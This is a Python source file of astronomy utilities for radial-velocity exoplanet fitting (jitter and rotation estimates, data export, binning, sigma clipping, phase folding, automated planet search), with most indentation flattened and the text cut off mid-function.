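# Hedged sketch (made-up stellar values): get_stellar_rotation only reads four attributes,
# so a simple namespace object is enough for a quick estimate.
def _example_stellar_rotation():
    from types import SimpleNamespace
    star = SimpleNamespace(stellar_vsini=2.0, stellar_vsini_err=0.5,
                           stellar_radius=1.0, stellar_radius_err=0.05)
    return get_stellar_rotation(star, print_output=False)
    # Rot = 2*pi*R[km] / (vsini[km/s] * 86400 s/day) ~ 25.3 days for these values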
def get_rv_scatter(obj, print_output=False,use_kb2011=False):
'''
Estimate the expected stellar RV "jitter" and its uncertainty from the stellar luminosity, mass and Teff,
following the Kjeldsen & Bedding scaling relations (the 2011 version if use_kb2011=True, else the 1995 one).
'''
Solar_fact = 0.234
Solar_fact_d = 0.014
M = float(obj.stellar_mass)
M_d = float(obj.stellar_mass_err)
L = float(obj.stellar_luminosity)
L_d = float(obj.stellar_luminosity_err)
Teff = float(obj.stellar_Teff)/5771.0
Teff_d = float(obj.stellar_Teff_err)/5771.0
if use_kb2011==True:
A = (L / ((M**1.5)*(Teff**4.25))) * Solar_fact
delta_A = 0.25*np.sqrt(
(L**2.0 * (
4.0*Teff**2.0 *(
(4.0 * (M**2.0) * (Solar_fact_d**2.0)) +
(9.0 * M_d**2.0 * Solar_fact**2.0)) +
(289.0 * (Teff_d**2.0) * (M**2.0) * (Solar_fact**2.0) )) +
(16.0 * (L_d**2.0) * (Teff**2.0) * (M**2.0) * (Solar_fact**2.0)) ) / ((Teff**(21.0/2.0)) * (M**5.0)) )
if print_output == True:
print("KB2011 jitter = %s +/- %s [m/s]"%(A, delta_A))
else:
A = (L/M) * Solar_fact
delta_A = np.sqrt( (L**2.0 * ((M**2.0)*(Solar_fact_d**2.0) + (M_d**2.0)*(Solar_fact**2.0) ) +
((L_d**2.0) *(M**2.0) * (Solar_fact**2.0) ) )/ M**4.0 )
if print_output == True:
print("KB1995 jitter = %s +/- %s [m/s]"%(A, delta_A))
return [A, delta_A]
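# Hedged sketch (solar-like values): the KB1995 branch simply scales as (L/M) * 0.234 m/s,
# so a Sun-like star yields roughly 0.23 m/s of oscillation-driven RV scatter.
def _example_rv_scatter():
    from types import SimpleNamespace
    star = SimpleNamespace(stellar_mass=1.0, stellar_mass_err=0.05,
                           stellar_luminosity=1.0, stellar_luminosity_err=0.05,
                           stellar_Teff=5771.0, stellar_Teff_err=50.0)
    return get_rv_scatter(star, print_output=False)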
def export_RV_data(obj, idset_ts, file="RV_data.txt", jitter=False, o_c=False,
print_data=False, remove_offset = False, width = 10, precision = 3):
if len(obj.filelist.idset)==0:
return
output_file = str(file)
f = open(output_file, 'w')
idset_ts = np.array(np.atleast_1d(idset_ts)) #-1
JD = obj.fit_results.rv_model.jd
if not o_c:
rv = obj.fit_results.rv_model.rvs
else:
rv = obj.fit_results.rv_model.o_c
id_set = obj.filelist.idset
if jitter==True:
sigma = add_jitter(obj,obj.fit_results.rv_model.rv_err, id_set)
else:
sigma = obj.fit_results.rv_model.rv_err
for i in range(len(idset_ts)):
for ii in range(len(JD)):
if int(id_set[ii]) != int(idset_ts[i]):
continue
else:
if not remove_offset:
rv[ii] = rv[ii] - float(obj.params.offsets[i])
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f} \n'.format(float(JD[ii]), float(rv[ii]), float(sigma[ii]), idset_ts[i], width = width, precision = precision ) )
if print_data:
print('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f}'.format(float(JD[ii]), float(rv[ii]), float(sigma[ii]), idset_ts[i], width = width, precision = precision ) )
f.close()
print('Done!')
return
def export_RV_model(obj, file="RV_model.txt", width = 10, precision = 4):
if len(obj.fit_results.rv_model.jd)==0:
return
#if not os.path.exists(path):
# os.makedirs(path)
output_file = str(file)
f = open(output_file, 'w')
JD = obj.fit_results.model_jd
if obj.doGP == True:
y_model = obj.fit_results.model + obj.gp_model_curve[0]
else:
y_model = obj.fit_results.model
for i in range(len(JD)):
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} \n'.format(float(JD[i]), float(y_model[i]), width = width, precision = precision) )
f.close()
print('Done!')
return
def export_orbital_evol(obj, file="orb_evol.txt", planet = 1, width = 10, precision = 6):
k = int(planet-1)
if len(obj.evol_T[k])==0 or k < 0:
print("No N-body integrations done?")
return
output_file = str(file)
f = open(output_file, 'w')
#obj.evol_T_energy
#obj.evol_energy
#obj.evol_momentum['lx']
#obj.evol_momentum['ly']
#obj.evol_momentum['lz']
T = obj.evol_T[k]
a = obj.evol_a[k]
e = obj.evol_e[k]
om = obj.evol_p[k]
M = obj.evol_M[k]
inc = obj.evol_i[k]
Om =obj.evol_Om[k]
for i in range(len(T)):
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f} {4:{width}.{precision}f} {5:{width}.{precision}f} {6:{width}.{precision}f} \n'.format(float(T[i]), float(a[i]), float(e[i]), float(om[i]),float(M[i]),float(inc[i]),float(Om[i]), width = width, precision = precision) )
f.close()
print('Done!')
return
def check_temp_RV_file(obj):
for i in range(obj.filelist.ndset):
if os.path.exists(obj.filelist.files[i].path) and os.access(obj.filelist.files[i].path, os.W_OK):
# print(obj.filelist.files[i].path)
continue
else:
dirname, basename = os.path.split(obj.filelist.files[i].path)
if platform.system() == 'Darwin':
dirname = '/tmp/es_%s'%(randomString(3))
else:
dirname = '/tmp/%s'%(randomString(3))
dirname = '%s/%s'%(dirname,randomString(5))
#else:
# dirname = os.path.abspath(dirname)+'_'+randomString(3)+'/'+randomString(3)
obj.filelist.files[i].path = os.path.join(dirname, basename)
os.makedirs(dirname)
f = open(obj.filelist.files[i].path, 'wb') # open the file
for j in range(len(obj.rv_data_sets[i][0])):
if str(obj.rv_data_sets[i][0][j]).startswith("#"):
continue
text = b"%s %s %s \n"%(bytes(str(obj.rv_data_sets[i][0][j]).encode()),bytes(str(obj.rv_data_sets[i][1][j]).encode()),bytes(str(obj.rv_data_sets[i][2][j]).encode()) )
f.write(text)
f.close()
def modify_temp_RV_file_old(obj, file_n = 0, add_error = 0, data_to_keep = None):
if obj.filelist.ndset < file_n +1:
print("No RV file # %s"%(file_n+1))
return
elif not os.path.exists(obj.filelist.files[file_n].path):
return
else:
if add_error < 0:
sign = -1
else:
sign = 1
new_error = []
for j in range(len(obj.rv_data_sets[file_n][0])):
k = obj.rv_data_sets[file_n][2][j]**2 + add_error**2 *sign
if k < 0:
print("You seem to subtract %s from the error budget. As a result, the RV uncertainty of one or more elements would be negative. Errors cannot be negative. Please subtract another value"%add_error)
return
new_error.append(k)
f = open(obj.filelist.files[file_n].path, 'wb') # open the file
for j in range(len(obj.rv_data_sets[file_n][0])):
if str(obj.rv_data_sets[file_n][0][j]).startswith("#") or data_to_keep != None and j not in data_to_keep:
continue
text = b"%s %s %s \n"%(bytes(str(obj.rv_data_sets[file_n][0][j]).encode()),bytes(str(obj.rv_data_sets[file_n][1][j]).encode()),bytes(str(np.sqrt(new_error[j])).encode()) )
f.write(text)
f.close()
obj.filelist.read_rvfiles(obj.params.offsets)
return obj
def common_member(a, b):
a_set = set(a)
b_set = set(b)
if (a_set & b_set):
return True
else:
return False
def bin_data(JD,rv,sigma,idset, bin_size = 1.0):
binning_list = []
v_l = [1100000,1212234324]
for i in range(len(JD)):
b_l = [x for x,z in enumerate(JD) if abs(z - JD[i]) < bin_size]
if common_member(b_l, v_l):
continue
else:
binning_list.append(b_l)
v_l = b_l
mj_all = []
mr_all = []
ms_all = []
mi_all = []
for x in range(len(binning_list)):
mj_all.append(np.mean(JD[binning_list[x]]))
mr_all.append(np.average(rv[binning_list[x]], weights=1./sigma[binning_list[x]]))
#ms_all.append(np.average(ms/np.sqrt(len(ms)), weights=1./ms) )
ms_all.append(np.average(sigma[binning_list[x]]) )
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + (abs(max(mr)-min(mr))**2.0) ) )
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + np.std(mr)**2.0) ) )
#print np.median(mr), np.std(mr)
mi_all.append(np.mean(idset[binning_list[x]]))
JD2, indices = np.unique(np.asarray(mj_all), return_index=True)
ind = np.array(indices)
mr_all = np.array(mr_all)
mj_all = np.array(mj_all)
ms_all = np.array(ms_all)
mi_all = np.array(mi_all)
mr_all = mr_all[ind]
mj_all = mj_all[ind]
ms_all = ms_all[ind]
mi_all = mi_all[ind]
print(len(JD2))
return mj_all, mr_all, ms_all, mi_all
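# Minimal sketch (synthetic values): the first two epochs fall inside one 1-day bin and are
# averaged (RVs weighted by 1/sigma); the third epoch stays on its own.
def _example_bin_data():
    JD    = np.array([2450000.1, 2450000.3, 2450005.2])
    rv    = np.array([10.0, 12.0, -5.0])
    sigma = np.array([1.0, 1.0, 2.0])
    idset = np.array([0, 0, 0])
    return bin_data(JD, rv, sigma, idset, bin_size=1.0)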
def bin_rv_data(obj, file_n = 0, bin_size = 1.0, bin_tf = False):
if bin_tf == False:
obj.rv_data_sets[file_n] = dill.copy(obj.rv_data_sets_init[file_n])
return
else:
JD = np.array(obj.rv_data_sets[file_n][0])
rv = np.array(obj.rv_data_sets[file_n][1])
sigma = np.array(obj.rv_data_sets[file_n][2])
idset = np.array(obj.rv_data_sets[file_n][3])
mj_all,mr_all,ms_all,mi_all = bin_data(JD,rv,sigma,idset, bin_size = bin_size)
obj.rv_data_sets[file_n] = np.array([mj_all,mr_all,ms_all,mi_all])
#obj.rv_data_sets[file_n][0] = dill.copy(mj_all)
#obj.rv_data_sets[file_n][1] = dill.copy(mr_all)
#obj.rv_data_sets[file_n][2] = dill.copy(ms_all)
#obj.rv_data_sets[file_n][3] = dill.copy(mi_all)
return obj
def bin_rv_dataOld(obj, file_n = 0, bin_size = 1.0, bin_tf = False):
if bin_tf == False:
obj.rv_data_sets[file_n] = dill.copy(obj.rv_data_sets_init[file_n])
return
else:
JD = np.array(obj.rv_data_sets[file_n][0])
rv = np.array(obj.rv_data_sets[file_n][1])
sigma = np.array(obj.rv_data_sets[file_n][2])
idset = np.array(obj.rv_data_sets[file_n][3])
mask = np.zeros(len(JD))
mj_all = []
mr_all = []
ms_all = []
mi_all = []
for x in range(len(JD)):
JD_int = JD.astype(int)
mask = (JD_int != JD_int[x]).astype(int)
mj = np.ma.masked_array(JD, mask=mask).compressed()
mr = np.ma.masked_array(rv, mask=mask).compressed()
ms = np.ma.masked_array(sigma, mask=mask).compressed()
mi = np.ma.masked_array(idset, mask=mask).compressed()
mj_all.append(np.mean(mj))
mr_all.append(np.average(mr, weights=1./ms))
#ms_all.append(np.average(ms/np.sqrt(len(ms)), weights=1./ms) )
ms_all.append(np.average(ms) )
mi_all.append(np.mean(mi))
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + (abs(max(mr)-min(mr))**2.0) ) )
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + np.std(mr)**2.0) ) )
#print np.median(mr), np.std(mr)
JD, indices = np.unique(np.asarray(mj_all), return_index=True)
ind = np.array(indices)
mr_all = np.array(mr_all)
mj_all = np.array(mj_all)
ms_all = np.array(ms_all)
mi_all = np.array(mi_all)
mr_all = mr_all[ind]
mj_all = mj_all[ind]
ms_all = ms_all[ind]
mi_all = mi_all[ind]
obj.rv_data_sets[file_n] = np.array([mj_all,mr_all,ms_all,mi_all])
#obj.rv_data_sets[file_n][0] = dill.copy(mj_all)
#obj.rv_data_sets[file_n][1] = dill.copy(mr_all)
#obj.rv_data_sets[file_n][2] = dill.copy(ms_all)
#obj.rv_data_sets[file_n][3] = dill.copy(mi_all)
return obj
def modify_temp_RV_file(obj, file_n = 0, add_error = 0, data_to_keep = None):
if obj.filelist.ndset < file_n +1:
print("No RV file # %s"%(file_n+1))
return
elif not os.path.exists(obj.filelist.files[file_n].path):
return
else:
if add_error < 0:
sign = -1
else:
sign = 1
new_error = []
for j in range(len(obj.rv_data_sets[file_n][0])):
k = obj.rv_data_sets[file_n][2][j]**2 + add_error**2 *sign
if k < 0:
print("You seem to subtract %s from the error budget. As a result, the RV uncertainty of one or more elements would be negative. Errors cannot be negative. Please subtract another value"%add_error)
return
new_error.append(k)
f = open(obj.filelist.files[file_n].path, 'wb') # open the file
org_data_file = obj.rv_data_sets[file_n]
for j in range(len(org_data_file[0])):
if str(org_data_file[0][j]).startswith("#") or data_to_keep != None and j not in data_to_keep:
continue
text = b"%s %s %s \n"%(bytes(str(org_data_file[0][j]).encode()),bytes(str(org_data_file[1][j]).encode()),bytes(str(np.sqrt(new_error[j])).encode()) )
f.write(text)
f.close()
obj.filelist.read_rvfiles(obj.params.offsets)
return obj
### some experiments! ###
def sigma_clip(obj, type = 'RV', sigma_clip = 10, file_n = 0, add_error = 0, remove_mean = False, verbose = True):
if type == 'RV':
if sigma_clip == None:
modify_temp_RV_file(obj, file_n = file_n, add_error = add_error, data_to_keep = None)
return
else:
obj2 = dill.copy(obj)
modify_temp_RV_file(obj2, file_n = file_n, add_error = add_error, data_to_keep = None)
#obj2.epoch = obj.epoch
obj2.fitting(outputfiles=[1,1,1], minimize_fortran=True, minimize_loglik=True,amoeba_starts=0)
JD_data = obj2.fit_results.rv_model.jd[obj2.filelist.idset==file_n]
o_c_data = obj2.fit_results.rv_model.o_c[obj2.filelist.idset==file_n]
data_ind = obj2.filelist.idset
c, low, upp = pdf.sigmaclip(o_c_data, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(o_c_data) if z in c]
removed_idx = [x for x, z in enumerate(o_c_data) if z not in c]
modify_temp_RV_file(obj, file_n = file_n, add_error = add_error, data_to_keep = remaining_idx)
del obj2
if verbose:
print("\n %s clipped epochs:"%type)
for z in JD_data[removed_idx]:
print(z)
return obj
if type == 'act':
if len(obj.act_data_sets[file_n]) == 0:
print("No act. file # %s"%(file_n))
return
org_epoch = obj.act_data_sets_init[file_n][0]
org_data = obj.act_data_sets_init[file_n][1]
org_data_sig = obj.act_data_sets_init[file_n][2]
org_data_mean = org_data - np.mean(org_data)
if sigma_clip != None:
c, low, upp = pdf.sigmaclip(org_data_mean, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(org_data_mean) if z in c]
removed_idx = [x for x, z in enumerate(org_data_mean) if z not in c]
obj.act_data_sets[file_n][1] = np.take(obj.act_data_sets_init[file_n][1], remaining_idx)
obj.act_data_sets[file_n][0] = np.take(obj.act_data_sets_init[file_n][0], remaining_idx)
obj.act_data_sets[file_n][2] = np.take(obj.act_data_sets_init[file_n][2], remaining_idx)
new_org_data = obj.act_data_sets[file_n][1]
new_org_data_mean = new_org_data - np.mean(new_org_data)
if verbose:
print("\n %s clipped epochs:"%type)
for z in org_epoch[removed_idx]:
print(z)
if remove_mean == True:
obj.act_data_sets[file_n][1] = new_org_data_mean
else:
if remove_mean == True:
obj.act_data_sets[file_n][0] = org_epoch
obj.act_data_sets[file_n][1] = org_data_mean
obj.act_data_sets[file_n][2] = org_data_sig
else:
obj.act_data_sets[file_n][0] = org_epoch
obj.act_data_sets[file_n][1] = org_data
obj.act_data_sets[file_n][2] = org_data_sig
return obj
if type == 'tra':
if len(obj.tra_data_sets[file_n]) == 0:
print("No transit file # %s"%(file_n))
return
org_epoch = obj.tra_data_sets_init[file_n][0]
org_data = obj.tra_data_sets_init[file_n][1]
org_data_sig = obj.tra_data_sets_init[file_n][2]
org_data_air = obj.tra_data_sets_init[file_n][3]
org_data_o_c = obj.tra_data_sets_init[file_n][4]
org_data_mean = org_data_o_c - np.mean(org_data_o_c)
if sigma_clip != None:
c, low, upp = pdf.sigmaclip(org_data_mean, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(org_data_mean) if z in c]
removed_idx = [x for x, z in enumerate(org_data_mean) if z not in c]
obj.tra_data_sets[file_n][3] = np.take(obj.tra_data_sets_init[file_n][3], remaining_idx)
obj.tra_data_sets[file_n][0] = np.take(obj.tra_data_sets_init[file_n][0], remaining_idx)
obj.tra_data_sets[file_n][2] = np.take(obj.tra_data_sets_init[file_n][2], remaining_idx)
obj.tra_data_sets[file_n][1] = np.take(obj.tra_data_sets_init[file_n][1], remaining_idx)
obj.tra_data_sets[file_n][4] = np.take(obj.tra_data_sets_init[file_n][4], remaining_idx)
new_org_data = obj.tra_data_sets[file_n][1]
new_org_data_mean = new_org_data - np.mean(new_org_data)
if verbose:
print("\n %s clipped epochs:"%type)
for z in org_epoch[removed_idx]:
print(z)
#if remove_mean == True:
# obj.tra_data_sets[file_n][1] = new_org_data_mean
else:
# if remove_mean == True:
# obj.tra_data_sets[file_n][0] = org_epoch
# obj.tra_data_sets[file_n][1] = org_data_mean
# obj.tra_data_sets[file_n][2] = org_data_sig
#
# else:
obj.tra_data_sets[file_n][0] = org_epoch
obj.tra_data_sets[file_n][1] = org_data
obj.tra_data_sets[file_n][2] = org_data_sig
obj.tra_data_sets[file_n][3] = org_data_air
obj.tra_data_sets[file_n][4] = org_data_o_c
return obj
### some experiments! ###
def sigma_clip_act(JD_,act_,sigma_,idset_, sigma_clip = 10, verbose = True):
act = act_ - np.mean(act_)
c, low, upp = pdf.sigmaclip(act, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(act) if z in c]
removed_idx = [x for x, z in enumerate(act) if z not in c]
act = np.take(act_, remaining_idx)
JD = np.take(JD_, remaining_idx)
sigma = np.take(sigma_, remaining_idx)
idset = np.take(idset_, remaining_idx)
if verbose:
print("\n activity clipped epochs:")
for z in JD_[removed_idx]:
print(z)
return JD,act,sigma,idset
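# Minimal sketch (synthetic activity series): a single strong outlier should be rejected by
# a 3-sigma clip of the mean-subtracted activity values.
def _example_sigma_clip_act():
    JD    = np.arange(20, dtype=float)
    act   = np.array([0.01, -0.01] * 9 + [0.01, 1.0])   # the last value is the outlier
    sigma = np.ones(20) * 0.01
    idset = np.zeros(20)
    return sigma_clip_act(JD, act, sigma, idset, sigma_clip=3, verbose=False)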
def transit_data_norm(obj, file_n = 0, norm = False, verbose = True):
if len(obj.tra_data_sets[file_n]) == 0:
print("No transit file # %s"%(file_n))
return
if norm == True:
obj.tra_data_sets[file_n][0] = obj.tra_data_sets_init[file_n][0]
obj.tra_data_sets[file_n][1] = obj.tra_data_sets_init[file_n][1]/np.mean(obj.tra_data_sets_init[file_n][1])
obj.tra_data_sets[file_n][2] = obj.tra_data_sets_init[file_n][2]/np.mean(obj.tra_data_sets_init[file_n][1])
else:
obj.tra_data_sets[file_n][0] = dill.copy(obj.tra_data_sets_init[file_n][0])
obj.tra_data_sets[file_n][1] = dill.copy(obj.tra_data_sets_init[file_n][1])
obj.tra_data_sets[file_n][2] = dill.copy(obj.tra_data_sets_init[file_n][2])
return obj
### some experiments! ###
def gen_RV_curve(obj,x=None):
obj2 = dill.copy(obj)
if len(x) > 3:
f = open('datafiles/RV_curve', 'wb') # open the file
for j in range(len(x)):
#print(fit_new.rv_data_sets[i][0][j])
text = b"%s %s %s \n"%(bytes(str(x[j]).encode()),bytes(str(0.0).encode()),bytes(str(1.0).encode()) )
f.write(text)
f.close()
obj2.add_dataset("RV_curve", "datafiles/RV_curve",0.0,0.0) # the last two entries are initial offset and jitter
os.system("rm datafiles/RV_curve")
obj2.fitting(outputfiles=[0,1,0], minimize_fortran=True, minimize_loglik=True, amoeba_starts=0, print_stat=False)
jd = obj2.fit_results.rv_model.jd
# rvs = obj2.fit_results.rv_model.rvs
o_c = obj2.fit_results.rv_model.o_c*(-1)
return np.array([jd,o_c])
#############################
def file_from_path(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
def run_command_with_timeout(args, secs, output=False, pipe=False): # set output=True if you need to save the output
'''
Run a command and kill if it takes too long.
'''
# print(args)
if not (pipe):
text=tempfile.TemporaryFile() # because PIPE usually has too low capacity
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=text, stderr=text)
else:
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=PIPE, stderr=PIPE)
# print(proc)
proc_thread = Thread(target=proc.wait)
proc_thread.start()
proc_thread.join(secs)
if proc_thread.is_alive():
#print (proc.pid)
try:
os.killpg(proc.pid, signal.SIGTERM)
except OSError:
pass
#print(args)
print('Process #{} killed after {} seconds'.format(proc.pid, secs))
flag = -1
return '',flag
if not (pipe):
text.seek(0)
string_to_output=text.readlines()
else:
text=proc.communicate()[0]
string_to_output=text.splitlines()
# text.close()
for i in range(len(string_to_output)):
string_to_output[i]=string_to_output[i].decode('utf-8').split()
if not (pipe):
text.close()
flag = 1
if (output):
return string_to_output,flag # besides the flag which informs about successful termination we also return all the console output in case we want to save it in a variable
else:
return '',flag
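# Minimal usage sketch (the shell command is only an illustration): run a short command with
# a generous timeout and capture its console output as a list of token lists.
def _example_run_command_with_timeout():
    output, flag = run_command_with_timeout("echo hello", 5, output=True)
    return output, flag   # flag == 1 on normal termination, -1 if the process was killed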
def run_command_with_timeout_old(args, secs, output=False, pipe=False): # set output=True if you need to save the output
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=PIPE)
proc_thread = Thread(target=proc.wait)
proc_thread.start()
proc_thread.join(secs)
text = proc.communicate()[0]
flag = 1
if proc_thread.is_alive():
try:
os.killpg(proc.pid, signal.SIGTERM)
except OSError:
print('Process #{} killed after {} seconds'.format(proc.pid, secs))
flag = -1
#text = '0 0 0 0'
return text.decode('utf-8'),flag
#return proc, flag , text.decode('utf-8')
return text.decode('utf-8'),flag
def phase_RV_planet_signal(obj,planet):
if obj.npl ==0 or len(obj.fit_results.rv_model.jd) ==0:
return
else:
copied_obj = dill.copy(obj)
if(copied_obj.mod_dynamical):
copied_obj.mod_dynamical = False
index = planet - 1
############################################
############# here is the trick! ##########
############################################
pp0 = copied_obj.params.planet_params[7*index+0] # we define a variable to be the planet amplitude Kj
copied_obj.params.planet_params[7*index+0] = 0.0000001 # then we set Kj to be 0, i.e. remove the j-th planet signal
copied_obj.fitting(minimize_loglik=True, amoeba_starts=0,
outputfiles=[0,1,1],return_flag=False, npoints=int(obj.model_npoints),
# model_max=int(max(obj.fit_results.model_jd)-max(copied_obj.fit_results.rv_model.jd)),
# model_min=int(copied_obj.epoch -min(obj.fit_results.model_jd)))
model_max=int(copied_obj.model_max),
model_min=int(copied_obj.model_min))
# and we create the static Nplanet model for the data and the model curve
# now the model residuals will contain ONLY the j-th planet signal + the best-fit residuals
copied_obj.params.planet_params[7*index+0] = pp0 # we restore Kj to its best fit value.
############################################
######### trick is over ##########
############################################
#print(copied_obj.params.planet_params[7*index+1])
#print((copied_obj.epoch- copied_obj.fit_results.rv_model.jd[0])% copied_obj.params.planet_params[7*index+1] )
############ phase fold fix for sparse model ######
model_time_phase = np.array( (copied_obj.fit_results.model_jd -copied_obj.fit_results.model_jd[0] + (copied_obj.fit_results.model_jd[0] - copied_obj.epoch) )%copied_obj.params.planet_params[7*index+1] )
model_shift = copied_obj.params.planet_params[7*index+1] - (copied_obj.fit_results.rv_model.jd[0] - copied_obj.epoch )%copied_obj.params.planet_params[7*index+1]
model_time_phase = (model_time_phase + model_shift)% copied_obj.params.planet_params[7*index+1]
sort = sorted(range(len(model_time_phase)), key=lambda k: model_time_phase[k])
model_time_phase = model_time_phase[sort]
#print(len(obj.fit_results.model),len(copied_obj.fit_results.model))
phased_model = obj.fit_results.model[sort] - copied_obj.fit_results.model[sort]
############ phase data ######
data_time_phase = np.array( (copied_obj.fit_results.rv_model.jd - copied_obj.fit_results.rv_model.jd[0])% copied_obj.params.planet_params[7*index+1] )
sort = sorted(range(len(data_time_phase)), key=lambda k: data_time_phase[k])
data_time_phase = data_time_phase[sort]
phased_data = copied_obj.fit_results.rv_model.o_c[sort]# - copied_obj.fit_results.rv_model.rvs[sort]
phased_data_err = copied_obj.fit_results.rv_model.rv_err[sort]
phased_data_idset = copied_obj.fit_results.idset[sort]
if copied_obj.doGP == True:
phased_data = phased_data - copied_obj.gp_model_data[0][sort]
model = [model_time_phase, phased_model]
data = [data_time_phase, phased_data, phased_data_err, phased_data_idset]
del copied_obj
#####################
obj.ph_data[planet-1] = data
obj.ph_model[planet-1] = model
return data, model
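# Hedged usage sketch: 'fit' is a hypothetical, already-fitted session object; phase-fold the
# RV signal of the first planet. The phased data and model are returned and also stored in
# fit.ph_data[0] and fit.ph_model[0].
def _example_phase_rv(fit):
    return phase_RV_planet_signal(fit, 1)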
def find_planets(obj,fend=0.75):
power_levels = np.array([0.1,0.01,0.001])
# check if RV data is present
if obj.filelist.ndset <= 0:
return
# the first one on the data GLS
if obj.gls.power.max() <= obj.gls.powerLevel(obj.auto_fit_FAP_level):
return obj
else:
if obj.npl !=0:
for j in range(obj.npl):
obj.remove_planet(obj.npl-(j+1))
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls.hpstat["T0"]) )% (obj.gls.hpstat["P"]) )/ (obj.gls.hpstat["P"]) ) * 2*np.pi)
# obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(0,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
#now inspect the residuals
for i in range(1,int(obj.auto_fit_max_pl)):
if obj.gls_o_c.power.max() <= obj.gls_o_c.powerLevel(obj.auto_fit_FAP_level):
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
obj = run_gls_o_c(obj)
return obj
#elif (1/RV_per_res.hpstat["fbest"]) > 1.5:
else:
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls_o_c.hpstat["T0"]) )% (obj.gls_o_c.hpstat["P"]) )/ (obj.gls_o_c.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls_o_c.hpstat["amp"],obj.gls_o_c.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(i,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
#else:
# continue
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
return obj
def find_planets_old(obj):
# check if RV data is present
if obj.filelist.ndset <= 0:
return
# the first one on the data GLS
if obj.gls.power.max() <= obj.gls.powerLevel(obj.auto_fit_FAP_level):
return obj
else:
if obj.npl !=0:
for j in range(obj.npl):
obj.remove_planet(obj.npl-(j+1))
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls.hpstat["T0"]) )% (obj.gls.hpstat["P"]) )/ (obj.gls.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(0,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
#now inspect the residuals
for i in range(1,int(obj.auto_fit_max_pl)):
if obj.gls_o_c.power.max() <= obj.gls_o_c.powerLevel(obj.auto_fit_FAP_level):
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
obj = run_gls_o_c(obj)
return obj
#elif (1/RV_per_res.hpstat["fbest"]) > 1.5:
else:
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls_o_c.hpstat["T0"]) )% (obj.gls_o_c.hpstat["P"]) )/ (obj.gls_o_c.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls_o_c.hpstat["amp"],obj.gls_o_c.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(i,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
#else:
# continue
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
return obj
def run_gls(obj,fend =1.0,fbeg=10000):
#fbeg = abs(max(obj.fit_results.rv_model.jd)-min(obj.fit_results.rv_model.jd)) * 2.0
omega = 1/ np.logspace(np.log10(fend), np.log10(fbeg), num=int(1000))
